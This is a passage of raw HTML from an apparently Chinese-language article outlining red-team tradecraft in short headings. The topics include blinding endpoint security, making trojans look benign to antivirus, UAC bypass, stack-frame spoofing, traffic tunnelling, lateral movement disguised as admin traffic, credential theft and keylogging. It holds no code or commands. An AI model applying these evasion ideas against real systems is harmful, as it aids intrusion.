&#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(2)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">功能致盲 让“白软件”传“黑”信。</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">例如部分功能致盲后，终端软件会告诉总控，“我安全我安全~”</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(3)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">白程序（云查为例）</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">让杀毒认为木马“白”，利用杀软的算法和公式反脆弱</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(4)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">利用系统自带组件实现提权/BypassUAC</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(5)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">栈帧伪造（伪造合法的Api调用（白）链绕过栈回溯检测）【躲内存检测】</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">3. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">流量绕过</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(1)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">加密vs降熵; 隧道传出</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(2)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">CDN 节点默认证书（白）</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">4. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">白化 服务和进程</span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">    </span><o:page></o:page></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(1)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">一种是肉眼不可见</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(2)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">另一种是服务和进程虽然可见，但可信</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">          </span><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></o:p></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></o:p></p><h1 style="line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">7.</span></span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">内网横向</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;"> </span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">   </span></h1><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">1. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">白化行为</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(1)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">降低扫描甚至不扫描</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(2)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">控集权</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(3)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">打成正常管理流量</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(4)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">寻找感知类产品的盲区，例如ipv6的监控、逻辑漏洞的监控、加密流量的迷惑...</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">2. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">ATO攻击（凭证窃取、密码复用、信息复用+认证推理...）</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"><span leaf=""><img class="rich_pages wxw-img" data-ratio="0.8657407407407407" style="width: 451.809998px;height: auto !important;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=cbf7fe3f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLTs2RAMgQOGohbItgvWCOdANWb1G9RicsQRLDd2RCyp2uZt2ibtYTIRgOyfWdmzmHCrEgvT2vjeong%2F640%3Fwx_fmt%3Dpng"/></span></span><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;"></span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">3. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">被动攻击（水坑、键盘记录、流量劫持、监控...）</span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">    </span><o:page></o:page></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"><span leaf=""><img class="rich_pages wxw-img" data-ratio="0.34074074074074073" style="width: 552.940002px;height: auto !important;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=28ce1a18&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLTs2RAMgQOGohbItgvWCOdic6TGlzprVv7icyYK1YVTTGvvqicTibvlnd37Pdp0mOjIy0yns7fNwOJqg%2F640%3Fwx_fmt%3Dpng"/></span></span><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;"></span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">4. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">白业务（正常的业务管理功能，例如应用的审计功能、正常的调用）</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">5. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">逻辑控制</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">     </span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">     </span><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></o:p></p><h1 style="line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">8.</span></span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica 